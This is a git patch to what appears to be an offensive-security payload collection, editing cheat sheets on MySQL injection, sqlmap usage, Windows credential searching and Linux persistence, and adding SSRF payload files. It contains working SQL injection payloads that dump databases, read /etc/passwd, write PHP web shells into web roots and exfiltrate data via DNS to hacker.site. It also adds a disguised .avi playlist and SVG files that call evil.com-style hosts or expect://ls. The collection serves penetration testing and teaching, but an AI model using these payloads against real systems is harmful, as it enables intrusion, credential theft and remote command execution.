From c66197903f7390b6830ce7a813925d295381c0fb Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Sun, 14 Apr 2019 19:46:34 +0200
Subject: [PATCH] MYSQL Truncation attack + Windows search where

---
 .../Linux - Persistence.md                    |  2 +-
 .../Windows - Privilege Escalation.md         |  2 +
 SQL Injection/MySQL Injection.md              | 54 +++++++++++++++----
 SQL Injection/README.md                       |  6 +++
 .../Files/ssrf_ffmpeg.avi                     |  5 ++
 Server Side Request Forgery/README.md         |  1 +
 .../Files/SSRF_expect.svg                     |  3 ++
 .../Files/SSRF_url.svg                        |  3 ++
 8 files changed, 65 insertions(+), 11 deletions(-)
 create mode 100644 Server Side Request Forgery/Files/ssrf_ffmpeg.avi
 create mode 100644 Server Side Template Injection/Files/SSRF_expect.svg
 create mode 100644 Server Side Template Injection/Files/SSRF_url.svg

diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md
index b5895ac..a80c802 100644
--- a/Methodology and Resources/Linux - Persistence.md	
+++ b/Methodology and Resources/Linux - Persistence.md	
@@ -50,7 +50,7 @@ sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
 
 ## Backdooring an user startup file
 
-Linux, write a file in  `~/.config/autostart/NOM_OF_FILE.desktop`
+Linux, write a file in  `~/.config/autostart/NAME_OF_FILE.desktop`
 
 ```powershell
 In : ~/.config/autostart/*.desktop
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index b63bae5..8c751b6 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -200,6 +200,8 @@ findstr /spin "password" *.*
 
 ```powershell
 dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
+where /R C:\ user.txt
+where /R C:\ *.ini
 ```
 
 ### Search the registry for key names and passwords
diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index cf4f672..3677441 100644
--- a/SQL Injection/MySQL Injection.md	
+++ b/SQL Injection/MySQL Injection.md	
@@ -1,6 +1,32 @@
 # MYSQL Injection
 
-## MYSQL
+## Summary
+
+* [MYSQL Comment](#mysql-comment)
+* [Detect columns number](#detect-columns-number)
+* [MYSQL Union Based](#mysql-union-based)
+    * [Extract database with information_schema](#extract-database-with-information-schema)
+    * [Extract data without information_schema](#extract-data-without-information-schema)
+    * [Extract data without columns name](#extract-data-without-columns-name)
+* [MYSQL Error Based - Basic](#mysql-error-based---basic)
+* [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function)
+* [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function)
+* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
+* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
+* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
+* [MYSQL Blind with LIKE](#mysql-blind-with-like)
+* [MYSQL Time Based](#mysql-time-based)
+* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
+* [MYSQL Read content of a file](#mysql-read-content-of-a-file)
+* [MYSQL Write a shell](#mysql-write-a-shell)
+* [MYSQL Truncation](#mysql-truncation)
+* [MYSQL Out of band](#mysql-out-of-band)
+    * [DNS exfiltration](#dns-exfiltration)
+    * [UNC Path - NTLM hash stealing](#unc-path---ntlm-hash-stealing)
+* [References](#references)
+
+
+## MYSQL comment
 
 ```sql
 # MYSQL Comment
@@ -9,9 +35,12 @@
 /*!32302 10*/ Comment for MYSQL version 3.23.02
 ```
 
-## Detect columns number
 
-Using a simple ORDER
+## MYSQL Union Based
+
+### Extract database with information_schema
+
+First you need to know the number of columns, you can use `order by`.
 
 ```sql
 order by 1
@@ -21,7 +50,7 @@ order by 3
 order by XXX
 ```
 
-## MYSQL Union Based
+Then the following codes will extract the databases'name, tables'name, columns'name.
 
 ```sql
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
@@ -59,7 +88,7 @@ Method for `MySQL 5`
 ...
 ```
 
-### Extract data without information_schema 
+### Extract data without columns name 
 
 Extracting data from the 4th column without knowing its name.
 
@@ -154,7 +183,7 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
 AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ```
 
-## MYSQL Blind with wildcard character
+## MYSQL Blind with LIKE
 
 ['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing
 
@@ -192,7 +221,7 @@ Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The
 ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
 ```
 
-## MYSQL DROP SHELL
+## MYSQL Write a shell
 
 ```sql
 SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
@@ -202,6 +231,10 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
 [...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
 ```
 
+## MYSQL Truncation
+
+In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
+
 ## MYSQL Out of band
 
 ```powershell
@@ -209,14 +242,14 @@ select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';
 select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt
 ```
 
-DNS exfiltration
+### DNS exfiltration
 
 ```sql
 select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
 select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))
 ```
 
-UNC Path - NTLM hash stealing
+### UNC Path - NTLM hash stealing
 
 ```sql
 select load_file('\\\\error\\abc');
@@ -230,4 +263,5 @@ load data infile '\\\\error\\abc' into table database.table_name;
 
 - [MySQL Out of Band Hacking - @OsandaMalith](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
 - [[Sqli] Extracting data without knowing columns names - Ahmed Sultan @0x4148](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
-- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)
\ No newline at end of file
+- [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1)
+- [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
\ No newline at end of file
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index a831e98..b7f8f77 100644
--- a/SQL Injection/README.md	
+++ b/SQL Injection/README.md	
@@ -169,6 +169,12 @@ sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threa
 sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5
 ```
 
+### Using a proxy with SQLmap
+
+```powershell
+sqlmap -u "http://www.target.com" --proxy="http://127.0.0.1:8080"
+```
+
 ### Using Chrome cookie and a Proxy
 
 ```powershell
diff --git a/Server Side Request Forgery/Files/ssrf_ffmpeg.avi b/Server Side Request Forgery/Files/ssrf_ffmpeg.avi
new file mode 100644
index 0000000..a9f2708
--- /dev/null
+++ b/Server Side Request Forgery/Files/ssrf_ffmpeg.avi	
@@ -0,0 +1,5 @@
+#EXTM3U
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:1.0
+http://ssrfevil.com
+#EXT-X-ENDLIST
\ No newline at end of file
diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index b48ff94..d249403 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -512,3 +512,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 - [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/)
 - [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)
 - [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)
+- [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
\ No newline at end of file
diff --git a/Server Side Template Injection/Files/SSRF_expect.svg b/Server Side Template Injection/Files/SSRF_expect.svg
new file mode 100644
index 0000000..bb53257
--- /dev/null
+++ b/Server Side Template Injection/Files/SSRF_expect.svg	
@@ -0,0 +1,3 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
+    <image xlink:href="expect://ls"></image>
+</svg>
\ No newline at end of file
diff --git a/Server Side Template Injection/Files/SSRF_url.svg b/Server Side Template Injection/Files/SSRF_url.svg
new file mode 100644
index 0000000..3252781
--- /dev/null
+++ b/Server Side Template Injection/Files/SSRF_url.svg	
@@ -0,0 +1,3 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
+    <image xlink:href="http://evil.com/"></image>
+</svg>
\ No newline at end of file